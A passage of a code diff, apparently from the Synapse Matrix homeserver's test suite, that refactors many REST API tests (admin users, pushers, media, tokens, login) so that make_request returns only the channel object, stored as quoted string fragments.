channel = self.make_request(", + " \"PUT\",", + "@@ -759,3 +751,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -803,3 +795,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -829,3 +821,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -846,3 +838,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -858,3 +850,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", + "@@ -876,3 +868,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -889,3 +881,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", + "@@ -906,3 +898,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -919,3 +911,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", + "@@ -933,3 +925,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Deactivate the user.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -946,3 +938,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Attempt to reactivate the user (without a password).", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -955,3 +947,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Reactivate the user.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -966,3 +958,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", + "@@ -983,3 +975,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -995,3 +987,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url_other_user, access_token=self.admin_user_tok,", + "@@ -1013,3 +1005,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -1025,5 +1017,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Get user", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1037,3 +1027,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -1047,5 +1037,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", + " # Check user is not deactivated", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1091,3 +1079,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -1102,5 +1090,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", + "@@ -1114,5 +1100,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/users/@unknown_person:test/joined_rooms\"", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1127,5 +1111,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1140,5 +1122,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", + " # Get rooms", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -1159,5 +1139,3 @@ class UserMembershipRestTestCase(unittest.HomeserverTestCase):", + " # Get rooms", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -1190,3 +1168,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -1201,5 +1179,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", + "@@ -1213,5 +1189,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/users/@unknown_person:test/pushers\"", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1226,5 +1200,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1239,5 +1211,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", + " # Get pushers", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -1268,5 +1238,3 @@ class PushersRestTestCase(unittest.HomeserverTestCase):", + " # Get pushers", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -1309,3 +1277,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -1320,5 +1288,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", + "@@ -1332,5 +1298,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/users/@unknown_person:test/media\"", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1345,5 +1309,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -1361,3 +1323,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=5\", access_token=self.admin_user_tok,", + "@@ -1380,3 +1342,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=5\", access_token=self.admin_user_tok,", + "@@ -1399,3 +1361,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=5&limit=10\", access_token=self.admin_user_tok,", + "@@ -1414,3 +1376,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=-5\", access_token=self.admin_user_tok,", + "@@ -1426,3 +1388,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=-5\", access_token=self.admin_user_tok,", + "@@ -1444,3 +1406,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + " # Number of results is the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=20\", access_token=self.admin_user_tok,", + "@@ -1455,3 +1417,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + " # Number of max results is larger than the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=21\", access_token=self.admin_user_tok,", + "@@ -1466,3 +1428,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + " # Number of max results is smaller than the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=19\", access_token=self.admin_user_tok,", + "@@ -1478,3 +1440,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + " # `next_token` does not appear", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=19\", access_token=self.admin_user_tok,", + "@@ -1493,5 +1455,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -1510,5 +1470,3 @@ class UserMediaRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -1578,3 +1536,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " def _get_token(self) -> str:", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", self.url, b\"{}\", access_token=self.admin_user_tok", + "@@ -1587,3 +1545,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", + "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", + "@@ -1595,3 +1553,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", self.url, b\"{}\", access_token=self.other_user_tok", + "@@ -1623,3 +1581,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # Check that we don't see a new device in our devices list", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", + "@@ -1638,5 +1596,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # Test that we can successfully make a request", + "- request, channel = self.make_request(", + "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", + "- )", + "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1644,5 +1600,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # Logout with the puppet token", + "- request, channel = self.make_request(", + "- \"POST\", \"logout\", b\"{}\", access_token=puppet_token", + "- )", + "+ channel = self.make_request(\"POST\", \"logout\", b\"{}\", access_token=puppet_token)", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1650,5 +1604,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # The puppet token should no longer work", + "- request, channel = self.make_request(", + "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", + "- )", + "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", + " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1656,3 +1608,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # .. but the real user's tokens should still work", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", + "@@ -1669,5 +1621,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # Test that we can successfully make a request", + "- request, channel = self.make_request(", + "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", + "- )", + "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1675,3 +1625,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # Logout all with the real user token", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"logout/all\", b\"{}\", access_token=self.other_user_tok", + "@@ -1681,5 +1631,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # The puppet token should still work", + "- request, channel = self.make_request(", + "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", + "- )", + "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1687,3 +1635,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # .. but the real user's tokens shouldn't", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", + "@@ -1700,5 +1648,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # Test that we can successfully make a request", + "- request, channel = self.make_request(", + "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", + "- )", + "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", + " self.assertEqual(200, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1706,3 +1652,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # Logout all with the admin user token", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"logout/all\", b\"{}\", access_token=self.admin_user_tok", + "@@ -1712,5 +1658,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # The puppet token should no longer work", + "- request, channel = self.make_request(", + "- \"GET\", \"devices\", b\"{}\", access_token=puppet_token", + "- )", + "+ channel = self.make_request(\"GET\", \"devices\", b\"{}\", access_token=puppet_token)", + " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1718,3 +1662,3 @@ class UserTokenRestTestCase(unittest.HomeserverTestCase):", + " # .. but the real user's tokens should still work", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"devices\", b\"{}\", access_token=self.other_user_tok", + "@@ -1800,3 +1744,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url1, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url1, b\"{}\")", + " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1804,3 +1748,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", self.url2, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url2, b\"{}\")", + " self.assertEqual(401, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1815,5 +1759,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url1, access_token=other_user2_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url1, access_token=other_user2_token,)", + " self.assertEqual(403, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1821,5 +1763,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url2, access_token=other_user2_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url2, access_token=other_user2_token,)", + " self.assertEqual(403, int(channel.result[\"code\"]), msg=channel.result[\"body\"])", + "@@ -1834,5 +1774,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url1, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url1, access_token=self.admin_user_tok,)", + " self.assertEqual(400, channel.code, msg=channel.json_body)", + "@@ -1840,5 +1778,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url2, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url2, access_token=self.admin_user_tok,)", + " self.assertEqual(400, channel.code, msg=channel.json_body)", + "@@ -1850,5 +1786,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "- \"GET\", self.url1, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url1, access_token=self.admin_user_tok,)", + " self.assertEqual(200, channel.code, msg=channel.json_body)", + "@@ -1857,5 +1791,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url2, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url2, access_token=self.admin_user_tok,)", + " self.assertEqual(200, channel.code, msg=channel.json_body)", + "@@ -1870,5 +1802,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url1, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url1, access_token=other_user_token,)", + " self.assertEqual(200, channel.code, msg=channel.json_body)", + "@@ -1877,5 +1807,3 @@ class WhoisRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url2, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url2, access_token=other_user_token,)", + " self.assertEqual(200, channel.code, msg=channel.json_body)", + "diff --git a/tests/rest/client/test_consent.py b/tests/rest/client/test_consent.py", + "index e2e6a5e16..c74693e9b 100644", + "--- a/tests/rest/client/test_consent.py", + "+++ b/tests/rest/client/test_consent.py", + "@@ -63,3 +63,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", + " resource = consent_resource.ConsentResource(self.hs)", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor, FakeSite(resource), \"GET\", \"/consent?v=1\", shorthand=False", + "@@ -84,3 +84,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -99,3 +99,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", + " # POST to the consent page, saying we've agreed", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -111,3 +111,3 @@ class ConsentResourceTestCase(unittest.HomeserverTestCase):", + " # changed", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "diff --git a/tests/rest/client/test_ephemeral_message.py b/tests/rest/client/test_ephemeral_message.py", + "index a1ccc4ee9..56937dcd2 100644", + "--- a/tests/rest/client/test_ephemeral_message.py", + "+++ b/tests/rest/client/test_ephemeral_message.py", + "@@ -95,3 +95,3 @@ class EphemeralMessageTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", url)", + "+ channel = self.make_request(\"GET\", url)", + "diff --git a/tests/rest/client/test_identity.py b/tests/rest/client/test_identity.py", + "index 259c6a198..c0a9fc692 100644", + "--- a/tests/rest/client/test_identity.py", + "+++ b/tests/rest/client/test_identity.py", + "@@ -45,5 +45,3 @@ class IdentityTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- b\"POST\", \"/createRoom\", b\"{}\", access_token=tok", + "- )", + "+ channel = self.make_request(b\"POST\", \"/createRoom\", b\"{}\", access_token=tok)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -58,3 +56,3 @@ class IdentityTestCase(unittest.HomeserverTestCase):", + " request_url = (\"/rooms/%s/invite\" % (room_id)).encode(\"ascii\")", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\", request_url, request_data, access_token=tok", + "diff --git a/tests/rest/client/test_redactions.py b/tests/rest/client/test_redactions.py", + "index c1f516cc9..f0707646b 100644", + "--- a/tests/rest/client/test_redactions.py", + "+++ b/tests/rest/client/test_redactions.py", + "@@ -71,5 +71,3 @@ class RedactionsTestCase(HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"POST\", path, content={}, access_token=access_token", + "- )", + "+ channel = self.make_request(\"POST\", path, content={}, access_token=access_token)", + " self.assertEqual(int(channel.result[\"code\"]), expect_code)", + "@@ -78,5 +76,3 @@ class RedactionsTestCase(HomeserverTestCase):", + " def _sync_room_timeline(self, access_token, room_id):", + "- request, channel = self.make_request(", + "- \"GET\", \"sync\", access_token=self.mod_access_token", + "- )", + "+ channel = self.make_request(\"GET\", \"sync\", access_token=self.mod_access_token)", + " self.assertEqual(channel.result[\"code\"], b\"200\")", + "diff --git a/tests/rest/client/test_retention.py b/tests/rest/client/test_retention.py", + "index f56b5d923..31dc832fd 100644", + "--- a/tests/rest/client/test_retention.py", + "+++ b/tests/rest/client/test_retention.py", + "@@ -327,3 +327,3 @@ class RetentionNoDefaultPolicyTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"GET\", url, access_token=self.token)", + "+ channel = self.make_request(\"GET\", url, access_token=self.token)", + "diff --git a/tests/rest/client/test_shadow_banned.py b/tests/rest/client/test_shadow_banned.py", + "index 94dcfb9f7..e689c3fbe 100644", + "--- a/tests/rest/client/test_shadow_banned.py", + "+++ b/tests/rest/client/test_shadow_banned.py", + "@@ -91,3 +91,3 @@ class RoomTestCase(_ShadowBannedBase):", + " # Inviting the user completes successfully.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -105,3 +105,3 @@ class RoomTestCase(_ShadowBannedBase):", + " # The room creation is successful.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -160,3 +160,3 @@ class RoomTestCase(_ShadowBannedBase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -185,3 +185,3 @@ class RoomTestCase(_ShadowBannedBase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -200,3 +200,3 @@ class RoomTestCase(_ShadowBannedBase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -246,3 +246,3 @@ class ProfileTestCase(_ShadowBannedBase):", + " # The update should succeed.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -256,3 +256,3 @@ class ProfileTestCase(_ShadowBannedBase):", + " # The user's display name should be updated.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/profile/%s/displayname\" % (self.banned_user_id,)", + "@@ -284,3 +284,3 @@ class ProfileTestCase(_ShadowBannedBase):", + " # The update should succeed.", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "diff --git a/tests/rest/client/test_third_party_rules.py b/tests/rest/client/test_third_party_rules.py", + "index 0e96697f9..227fffab5 100644", + "--- a/tests/rest/client/test_third_party_rules.py", + "+++ b/tests/rest/client/test_third_party_rules.py", + "@@ -88,3 +88,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -106,3 +106,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -125,3 +125,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", + " # now send the event", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -144,3 +144,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", + " # now send the event", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -154,3 +154,3 @@ class ThirdPartyRulesTestCase(unittest.HomeserverTestCase):", + " # ... and check that it got modified", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "diff --git a/tests/rest/client/v1/test_directory.py b/tests/rest/client/v1/test_directory.py", + "index 7a2c653df..edd1d184f 100644", + "--- a/tests/rest/client/v1/test_directory.py", + "+++ b/tests/rest/client/v1/test_directory.py", + "@@ -93,3 +93,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(data)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url, request_data, access_token=self.user_tok", + "@@ -106,3 +106,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", + " request_data = json.dumps(data)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url, request_data, access_token=self.user_tok", + "@@ -120,3 +120,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", url, request_data, access_token=self.user_tok", + "@@ -130,3 +130,3 @@ class DirectoryTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", url, request_data, access_token=self.user_tok", + "diff --git a/tests/rest/client/v1/test_events.py b/tests/rest/client/v1/test_events.py", + "index 12a93f568..0a5ca317e 100644", + "--- a/tests/rest/client/v1/test_events.py", + "+++ b/tests/rest/client/v1/test_events.py", + "@@ -65,3 +65,3 @@ class EventStreamPermissionsTestCase(unittest.HomeserverTestCase):", + " # see issue #2602", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/events?access_token=%s\" % (\"invalid\" + self.token,)", + "@@ -71,3 +71,3 @@ class EventStreamPermissionsTestCase(unittest.HomeserverTestCase):", + " # valid token, expect content", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/events?access_token=%s&timeout=0\" % (self.token,)", + "@@ -89,3 +89,3 @@ class EventStreamPermissionsTestCase(unittest.HomeserverTestCase):", + " # valid token, expect content", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/events?access_token=%s&timeout=0\" % (self.token,)", + "@@ -151,3 +151,3 @@ class GetEventsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/events/\" + event_id, access_token=self.token,", + "diff --git a/tests/rest/client/v1/test_login.py b/tests/rest/client/v1/test_login.py", + "index 176ddf7ec..041f2766d 100644", + "--- a/tests/rest/client/v1/test_login.py", + "+++ b/tests/rest/client/v1/test_login.py", + "@@ -65,3 +65,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "@@ -84,3 +84,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "@@ -110,3 +110,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "@@ -129,3 +129,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "@@ -155,3 +155,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "@@ -174,3 +174,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "@@ -183,3 +183,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # we shouldn't be able to make requests without an access token", + "- request, channel = self.make_request(b\"GET\", TEST_URL)", + "+ channel = self.make_request(b\"GET\", TEST_URL)", + " self.assertEquals(channel.result[\"code\"], b\"401\", channel.result)", + "@@ -193,3 +193,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "@@ -200,5 +200,3 